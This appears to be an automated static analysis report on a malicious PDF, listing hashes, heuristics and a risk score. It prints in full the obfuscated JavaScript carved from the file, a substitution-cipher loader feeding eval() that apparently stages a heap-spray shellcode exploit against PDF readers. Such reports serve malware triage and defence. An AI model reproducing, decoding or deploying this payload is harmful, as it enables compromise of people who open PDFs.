Malicious PDF — malware analysis report

Static analysis result for SHA-256 985ae0ec596c49fb…

MALICIOUS

PDF

9.4 KB Created: 2010-06-15 21:35:57 Authoring application: eQ3LQYO9rft02 (via q3y6v8H) First seen: 2026-05-10
MD5: 19158063f1732b8e9e81467fda919174 SHA-1: 1c315473239ca5849bfc15d4c5d15a84412af603 SHA-256: 985ae0ec596c49fb08e10b6a27f1c9b0dc94670efea2f8dfefada859fa9c7ced
166 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The PDF_EVAL heuristic firing suggests that the JavaScript is obfuscated and uses an eval() call, likely to download and execute a second-stage payload. The extracted artifact javascript_obj0007_000.js is also flagged as suspicious due to script obfuscation. The confidence is moderate due to the obfuscation preventing a full analysis of the script's exact actions.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    %O {09%O09o(%OM, n%OG{ D%On ,{%O  09%OG{{M%Oo{,{%O50X0%O9X5G%OX{G{%Oo{n %OG<, %OMMP,%O,ooP%OGD n%OX,XG%OG{GX%O5M,o%O,G<9%O,,o9%O 5n,%OnP<5%O<909%OnP09%OG{{n%OW (X%OG(09%O0959%OM(nP%O(XG{%OGn09%OG{09%On,X5%OXonX%OGMGD%O,n<D%O,<,,%On5,<%O5(no%O5<5X%OGM5,%OD90W%OD<D9%OXM(5%O09XM%O0o(<%O(,0,%OD(0G%O0 XG%O000G%OXM0M%O0{0X%O0D0M%O0{XM%O0,0M%OXG09%O0WD<%O(MD<%O090 %O( (o%O<<(W\"v;\nyy.\nyyib4iypKyzpSLLN)RopHwCuC{9y==yXvr\nyyyyf4o9NKYT{fH}fSAGy=yOki4qcmiz\"%O9(9(%O9(9(%O9(9(%O<MGn%O((Pn%O00{ %OW<n %OW<< …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0007_000.js pdf-javascript-stream PDF /JS object 7 at offset 0x242 8072 bytes
SHA-256: 0c5c096b137a40f5a076dff6584bfe2ce78e3a85e626e1125b33f1ba92512a05
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). 109 of 145 identifiers look randomly generated (e.g. 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmn') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
function CrNtSeDK(CrNtSeDK,qOaI5esUjub5Uz) {var GYkIciFuitQSpQGwzjH=CrNtSeDK. substr (qOaI5esUjub5Uz, 1);return GYkIciFuitQSpQGwzjH;}/*MYUh9YmCXC5ebfm3Es|nb46HKC3AmB0yaK|aj8d7AYbb4*/function Sx3C8P5(LFpsyr9BY) {/*V9w9mO|iVFkPGMR6ArHWHqUloU|Gw4KI47IgLDEhIpwO1DL*/var GgqFuHh = new String("<>(){} .,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789");/*uSO29jdn4dtrY40S18z[C4kKj]ZbakTL2iE2*//*ifCCPta|jtBiiFk|qvCDKdevxqnV*/var JXHAhaxbcw /*gdSBgURPvbzfdYEj9[PujT5CxqzeTLO]ph1L2JbokRJDpNnpv2*/= new String("Qezvr.y185n{oGM6YwhglZI2JExRFBuHTVfcjqLiKU}pSAb7kNm3>4aOt)dsC<,X(9P0DW ");/*UMUXAANeUYs|EQCPILr|v86zoKcT5VtQhDnhD*/for(XD2dtlRblT0uZWbf=0;XD2dtlRblT0uZWbf<GgqFuHh.length;XD2dtlRblT0uZWbf++) {if(LFpsyr9BY == CrNtSeDK(JXHAhaxbcw, XD2dtlRblT0uZWbf)) {/*CYPuiUBkkKvR6hQ3X4[AO8L7]tB2RFtTd*/return CrNtSeDK(GgqFuHh, XD2dtlRblT0uZWbf);/*ECTFm3QYLN6bGTWJJlIV <XFkQWpAqJ9uLT0]NGMYTJ0acMjmxs7WGD*/}}return LFpsyr9BY;}/*XZnXGwX18qrw4y9TIIJi[WINK1Lh7OeVoHs]AFl2wTpqHoAQxJzY*//*AlqzxOxBsIp00|u6BmsUSZc6Z|ujiIGguwVhAIjtRP*/var ArCD86 = new String;var Anfu6AxGj = new String("\ntc>ydR HwffNCSGIAI9Uy=yki)y5>>cszv;\ntc>ysEil2ZIXd5tZ{uIi;\nKOkqapNky)un6PAPPBhRGUuOqzYfsgtZZaTYMS7L2A8yqc,Gg0hm2b9PYs}ovr\nyy)}pbiyzYfsgtZZaTYMS7L2A1bikUa}y*yXyQyqc,Gg0hm2b9PYs}ovr\nyyyyYfsgtZZaTYMS7L2Ay+=yYfsgtZZaTYMS7L2A;\nyy.\nyyYfsgtZZaTYMS7L2Ay=yYfsgtZZaTYMS7L2A14Oj4a>pkUz<8yqc,Gg0hm2b9PYs}oy/yXv;\nyy>iaO>kyYfsgtZZaTYMS7L2A;\n.\nKOkqapNkyJKTF(OIfnLhd6ppJzpSLLN)RopHwCuC{9vr\nyytc>yZAT}iO6mVfkNYuGcy=y<d<q<q<q<q;\nyytc>yf4o9NKYT{fH}fSAGy=yOki4qcmiz\"%O9(9(%O9(9(%O9(9(%O<MGn%O((Pn%O00{ %OW<n %OW<<,%OGM((%OGX9(%OGnM5%OGW<P%OMMG{%OMMMM%OWnDM%OoM9G%OGMGM%O09GM%OG(5M%O M09%O9XM(%O M09%O0GGD%OGM<(%OGMGn%O09GM%On <(%O0,WD%OG,5,%O<D<(%OGM,,%OGMGM%O5500%On Gn%ODDWD%O0P,,%O<DG,%OGM,M%OGMGM%O5500%On GD%O{5WD%O,<PM%O<DXo%OGM<o%OGMGM%O5500%On G(%O<<WD%O<MX,%O<DWM%OGM(n%OGMGM%O5500%On MM%OXGWD%O<5 0%O<DPD%OGMX %OGMGM%O5500%O5MMn%OoD0M%O 5X{%O00,P%OMD55%OGW<0%OGMGG%On,GM%O 500%O09{n%OGn55%OGGWP%O09n0%OMDn5%O<Dn %OGM09%OGMGM%OWDnM%OMPo %O M{<%ODW<D%OGMGM%O00GM%OM(55%OX509%OXM0{%O00nM%O{M55%O,<WD%OGMGM%OnMGM%O5509%OWPMn%On0Go%On509%O<DMD%OGMWG%OGMGM%O55G{%OXW{M%On(GM%O{, ,%OXWW5%OGn5M%OW5 D%OGMGM%O 5,<%O09{M%OG(55%OGGWP%O09n0%OMDn5%O5M<D%OGMGM%OWPGM%OnDGW%O55G{%Oo{{n%On{(9%O,<n{%O{M 5%On{nM%O5509%OWPM(%On0G5%On509%O<DMD%OGM{{%OGMGM%OGMWP%O 5,<%O09{M%OGD55%OGoWP%O09n0%OMDn5%OMM<D%OGMGM%OWPGM%O09,<%OMM55%OGGWP%O09n0%OMDn5%OGM<D%OGMGM%O5GGM%Onon9%O<GG{%O<GG{%O<GG{%O<GG{%O<(0{%OnPGn%O09n{%O<o(P%Ono,W%O<M,<%O09n5%O09<(%OGD X%OnX09%On G(%O {09%O09o(%OM, n%OG{ D%On ,{%O  09%OG{{M%Oo{,{%O50X0%O9X5G%OX{G{%Oo{n %OG<, %OMMP,%O,ooP%OGD n%OX,XG%OG{GX%O5M,o%O,G<9%O,,o9%O 5n,%OnP<5%O<909%OnP09%OG{{n%OW (X%OG(09%O0959%OM(nP%O(XG{%OGn09%OG{09%On,X5%OXonX%OGMGD%O,n<D%O,<,,%On5,<%O5(no%O5<5X%OGM5,%OD90W%OD<D9%OXM(5%O09XM%O0o(<%O(,0,%OD(0G%O0 XG%O000G%OXM0M%O0{0X%O0D0M%O0{XM%O0,0M%OXG09%O0WD<%O(MD<%O090 %O( (o%O<<(W\"v;\nyypKyzpSLLN)RopHwCuC{9y==y,vr\nyyyyZAT}iO6mVfkNYuGcy=y<d(<(<(<(<;\nyyyyf4o9NKYT{fH}fSAGy=yOki4qcmiz\"%O9(9(%O9(9(%O9(9(%O<MGn%O((Pn%O00{ %OW<n %OW<<,%OGM((%OGX9(%OGnM5%OGW<P%OMMG{%OMMMM%OWnDM%OoM9G%OGMGM%O09GM%OG(5M%O M09%O9XM(%O M09%O0GGD%OGM<(%OGMGn%O09GM%On <(%O0,WD%OG,5,%O<D<(%OGM,,%OGMGM%O5500%On Gn%ODDWD%O0P,,%O<DG,%OGM,M%OGMGM%O5500%On GD%O{5WD%O,<PM%O<DXo%OGM<o%OGMGM%O5500%On G(%O<<WD%O<MX,%O<DWM%OGM(n%OGMGM%O5500%On MM%OXGWD%O<5 0%O<DPD%OGMX %OGMGM%O5500%O5MMn%OoD0M%O 5X{%O00,P%OMD55%OGW<0%OGMGG%On,GM%O 500%O09{n%OGn55%OGGWP%O09n0%OMDn5%O<Dn %OGM09%OGMGM%OWDnM%OMPo %O M{<%ODW<D%OGMGM%O00GM%OM(55%OX509%OXM0{%O00nM%O{M55%O,<WD%OGMGM%OnMGM%O5509%OWPMn%On0Go%On509%O<DMD%OGMWG%OGMGM%O55G{%OXW{M%On(GM%O{, ,%OXWW5%OGn5M%OW5 D%OGMGM%O 5,<%O09{M%OG(55%OGGWP%O09n0%OMDn5%O5M<D%OGMGM%OWPGM%OnDGW%O55G{%Oo{{n%On{(9%O,<n{%O{M 5%On{nM%O5509%OWPM(%On0G5%On509%O<DMD%OGM{{%OGMGM%OGMWP%O 5,<%O09{M%OGD55%OGoWP%O09n0%OMDn5%OMM<D%OGMGM%OWPGM%O09,<%OMM55%OGGWP%O09n0%OMDn5%OGM<D%OGMGM%O5GGM%Onon9%O<GG{%O<GG{%O<GG{%O<GG{%O<(0{%OnPGn%O09n{%O<o(P%Ono,W%O<M,<%O09n5%O09<(%OGD X%OnX09%On G(%O {09%O09o(%OM, n%OG{ D%On ,{%O  09%OG{{M%Oo{,{%O50X0%O9X5G%OX{G{%Oo{n %OG<, %OMMP,%O,ooP%OGD n%OX,XG%OG{GX%O5M,o%O,G<9%O,,o9%O 5n,%OnP<5%O<909%OnP09%OG{{n%OW (X%OG(09%O0959%OM(nP%O(XG{%OGn09%OG{09%On,X5%OXonX%OGMGD%O,n<D%O,<,,%On5,<%O5(no%O5<5X%OGM5,%OD90W%OD<D9%OXM(5%O09XM%O0o(<%O(,0,%OD(0G%O0 XG%O000G%OXM0M%O0{0X%O0D0M%O0{XM%O0,0M%OXG09%O0WD<%O(MD<%O090 %O( (o%O<<(W\"v;\nyy.\nyyib4iypKyzpSLLN)RopHwCuC{9y==yXvr\nyyyyf4o9NKYT{fH}fSAGy=yOki4qcmiz\"%O9(9(%O9(9(%O9(9(%O<MGn%O((Pn%O00{ %OW<n %OW<<,%OGM((%OGX9(%OGnM5%OGW<P%OMMG{%OMMMM%OWnDM%OoM9G%OGMGM%O09GM%OG(5M%O M09%O9XM(%O M09%O0GGD%OGM<(%OGMGn%O09GM%On <(%O0,WD%OG,5,%O<D<(%OGM,,%OGMGM%O5500%On Gn%ODDWD%O0P,,%O<DG,%OGM,M%OGMGM%O5500%On GD%O{5WD%O,<PM%O<DXo%OGM<o%OGMGM%O5500%On G(%O<<WD%O<MX,%O<DWM%OGM(n%OGMGM%O5500%On MM%OXGWD%O<5 0%O<DPD%OGMX %OGMGM%O5500%O5MMn%OoD0M%O 5X{%O00,P%OMD55%OGW<0%OGMGG%On,GM%O 500%O09{n%OGn55%OGGWP%O09n0%OMDn5%O<Dn %OGM09%OGMGM%OWDnM%OMPo %O M{<%ODW<D%OGMGM%O00GM%OM(55%OX509%OXM0{%O00nM%O{M55%O,<WD%OGMGM%OnMGM%O5509%OWPMn%On0Go%On509%O<DMD%OGMWG%OGMGM%O55G{%OXW{M%On(GM%O{, ,%OXWW5%OGn5M%OW5 D%OGMGM%O 5,<%O09{M%OG(55%OGGWP%O09n0%OMDn5%O5M<D%OGMGM%OWPGM%OnDGW%O55G{%Oo{{n%On{(9%O,<n{%O{M 5%On{nM%O5509%OWPM(%On0G5%On509%O<DMD%OGM{{%OGMGM%OGMWP%O 5,<%O09{M%OGD55%OGoWP%O09n0%OMDn5%OMM<D%OGMGM%OWPGM%O09,<%OMM55%OGGWP%O09n0%OMDn5%OGM<D%OGMGM%O5GGM%Onon9%O<GG{%O<GG{%O<GG{%O<GG{%O<(0{%OnPGn%O09n{%O<o(P%Ono,W%O<M,<%O09n5%O09<(%OGD X%OnX09%On G(%O {09%O09o(%OM, n%OG{ D%On ,{%O  09%OG{{M%Oo{,{%O50X0%O9X5G%OX{G{%Oo{n %OG<, %OMMP,%O,ooP%OGD n%OX,XG%OG{GX%O5M,o%O,G<9%O,,o9%O 5n,%OnP<5%O<909%OnP09%OG{{n%OW (X%OG(09%O0959%OM(nP%O(XG{%OGn09%OG{09%On,X5%OXonX%OGMGD%O,n<D%O,<,,%On5,<%O5(no%O5<5X%OGM5,%OD90W%OD<D9%OXM(5%O09XM%O0o(<%O(,0,%OD(0G%O0 XG%O000G%OXM0M%O0{0X%O0D0M%O0{XM%O0,0M%OXG09%O0WD<%O(MD<%O090 %O( (o%O<<(W\"v;\nyy.\nyytc>ySw) oosb77fPYNKTy=y<d9<<<<<;\nyytc>yc4cuV4(AxfR,woM7y=yf4o9NKYT{fH}fSAG1bikUa}y*yX;\nyytc>yqc,Gg0hm2b9PYs}oy=ySw) oosb77fPYNKTy-yzc4cuV4(AxfR,woM7y+y<d(Wv;\nyytc>yYfsgtZZaTYMS7L2Ay=yOki4qcmiz\"%O < <%O < <\"v;\nyyYfsgtZZaTYMS7L2Ay=y)un6PAPPBhRGUuOqzYfsgtZZaTYMS7L2A8yqc,Gg0hm2b9PYs}ov;\nyytc>ymnOp2aFnK96d4tBVy=yzZAT}iO6mVfkNYuGcy-y<d9<<<<<vy/ySw) oosb77fPYNKT;\nyyKN>yztc>y>09ZdDWJKfJd7iSwy=y<;y>09ZdDWJKfJd7iSwyQymnOp2aFnK96d4tBV;y>09ZdDWJKfJd7iSwy++yvr\nyyyydR HwffNCSGIAI9U[>09ZdDWJKfJd7iSw]y=yYfsgtZZaTYMS7L2Ay+yf4o9NKYT{fH}fSAG;\nyy.\n.\nKOkqapNkykiXGVuJofUnxjKCJzvr\nyytc>yh9bS<4 NRT7M{HT9y=y<;\nyytc>y6VYSP}dLI PCN92fy=ycmm1tpi)i>ui>4pNk1aNRa>pkUzv;\nyycmm1qbic>Fp7i2OazsEil2ZIXd5tZ{uIiv;\n\nyypKyz6VYSP}dLI PCN92fyQyD1,vr\nyyyyJKTF(OIfnLhd6ppJz<v;\nyyyytc>y><w6(x0BC>SnI6Mfy=yOki4qcmiz\"%O<q<q%O<q<q\"v;\nyyyy)}pbiyz><w6(x0BC>SnI6Mf1bikUa}yQy99 PXv><w6(x0BC>SnI6Mfy+=y><w6(x0BC>SnI6Mf;\nyyyya}p4y1qNbbcjRaN>iy=y{Nbbcj1qNbbiqaG7cpbwkKNzr\nyyyyyy4OjSy:y\"\"8y74Uy:y><w6(x0BC>SnI6Mf\nyyyy.\nyyyyv;\nyy.\npKyz6VYSP}dLI PCN92fye=y vr\nyyyya>syr\npKyzcmm1LNq1{Nbbcj1UiawqNkvr\nyyyyyyyyJKTF(OIfnLhd6ppJzXv;\nyyyyyyyytc>yYHwaGMHq2cj{iC7by=yOki4qcmiz\"%< \"v;\nyyyyyyyy)}pbiyzYHwaGMHq2cj{iC7b1bikUa}yQy<d9<<<vYHwaGMHq2cj{iC7by+=yYHwaGMHq2cj{iC7b;\nyyyyyyyyYHwaGMHq2cj{iC7by=y\"I1\"y+yYHwaGMHq2cj{iC7b;\ncmm1LNq1{Nbbcj1UiawqNkzYHwaGMHq2cj{iC7bv;\nyyyyyyyyh9bS<4 NRT7M{HT9y=y,;\nyyyyyy.\nyyyyyyib4iyr\nyyyyyyyyh9bS<4 NRT7M{HT9y=y,;\nyyyyyy.\nyyyy.\nyyyyqcaq}yzivr\nyyyyyyh9bS<4 NRT7M{HT9y=y,;\nyyyy.\nyyyypKyzh9bS<4 NRT7M{HT9y==y,vr\nyyyyyypKyzz6VYSP}dLI PCN92fye=yD1,&&y6VYSP}dLI PCN92fyQy vvr\nyyyyyyyyJKTF(OIfnLhd6ppJz,v;\nyyyyyyyytc>yf0(nT KHCJpIUd)uy=y\",X                  \";\nyyyyyyyyKN>yzCMJpu)laTdDn)adDy=y<;yCMJpu)laTdDn)adDyQyXD0;yCMJpu)laTdDn)adDy++yvr\nyyyyyyyyyyf0(nT KHCJpIUd)uy+=y\"W\";\nyyyyyyyy.\nyyyyyyyyOapb1m>pkaKz\"%9P<<<K\"8yf0(nT KHCJpIUd)uv;\nyyyyyy.\nyyyy.\nyy.\n.\ncmm1b,YH d( ZAH(}FV{y=ykiXGVuJofUnxjKCJ;\nsEil2ZIXd5tZ{uIiy=ycmm14iaFp7i2Oaz\"cmm1b,YH d( ZAH(}FV{zv\"8y,<v;\n");/*HpUEq7wBPMeMlN{LwFRSzEoXFx6yELYM1sQ}qDk5PEI1SECFK*//*X9ZCXezUT3|rFXaW5GZgCokK|APj8Z3WZSYwxO*/for(VAmQeUlEFC9a=0;VAmQeUlEFC9a<Anfu6AxGj.length;VAmQeUlEFC9a++)ArCD86 += Sx3C8P5(CrNtSeDK(Anfu6AxGj,VAmQeUlEFC9a));eval(ArCD86);/*GHnxNB[k7U9dXoE]K8xt7MnUl6tYt*/

Open this report in the interactive analyzer, or submit your own file for analysis.